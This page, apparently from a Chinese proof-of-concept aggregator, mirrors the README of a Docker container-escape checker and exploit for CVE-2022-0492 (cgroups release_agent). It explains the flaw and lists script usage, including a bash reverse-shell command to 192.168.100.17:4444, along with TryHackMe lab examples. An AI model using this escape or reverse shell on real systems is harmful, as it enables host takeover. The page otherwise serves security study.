关联漏洞
标题:
Linux kernel 授权问题漏洞
(CVE-2022-0492)
描述:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在授权问题漏洞,该漏洞源于软件对用权限限制存在问题。攻击者可利用该漏洞可以通过Cgroups Release Agent 绕过Linux内核的限制,以升级他的权限。
描述
Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)
介绍
# CVE-2022-0492 Docker Breakout Checker and PoC
## Summary
Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.
A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it.
## Usage
```
# sh CVE-2022-0492.sh
[>] CVE-2022-0492 Docker Container Escape V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
sh CVE-2022-0492.sh --checker Verify if system is vulnerable.
sh CVE-2022-0492.sh -c|--command <COMMAND> Execute command on host machine.
sh CVE-2022-0492.sh -h|--help Print the help panel.
[>] Example:
sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'
```
## Examples
### [Hamlet](https://tryhackme.com/room/hamlet) from TryHackMe
Root user in host machine pwned by disabling UFW and then sent a reverse shell.
### [Misguided Ghosts](https://tryhackme.com/room/misguidedghosts) from TryHackMe
Root user in host machine pwned by setting SUID to bash, also sent reverse shell.
#### Sources:
- https://github.com/puckiestyle/CVE-2022-0492
- http://mon0dy.top/2022/04/16/%E8%BF%91%E6%9C%9FLinux%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%20exp%E6%B1%87%E6%80%BB/#cve-2022-0492
文件快照
[4.0K] /data/pocs/22fd863c78653c13da229a734b0087f81d635cce
├── [4.0K] assets
│ ├── [1.5M] Hamlet.gif
│ └── [1.9M] Misguided_Ghosts.gif
├── [4.7K] CVE-2022-0492.sh
├── [ 34K] LICENSE
└── [2.1K] README.md
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。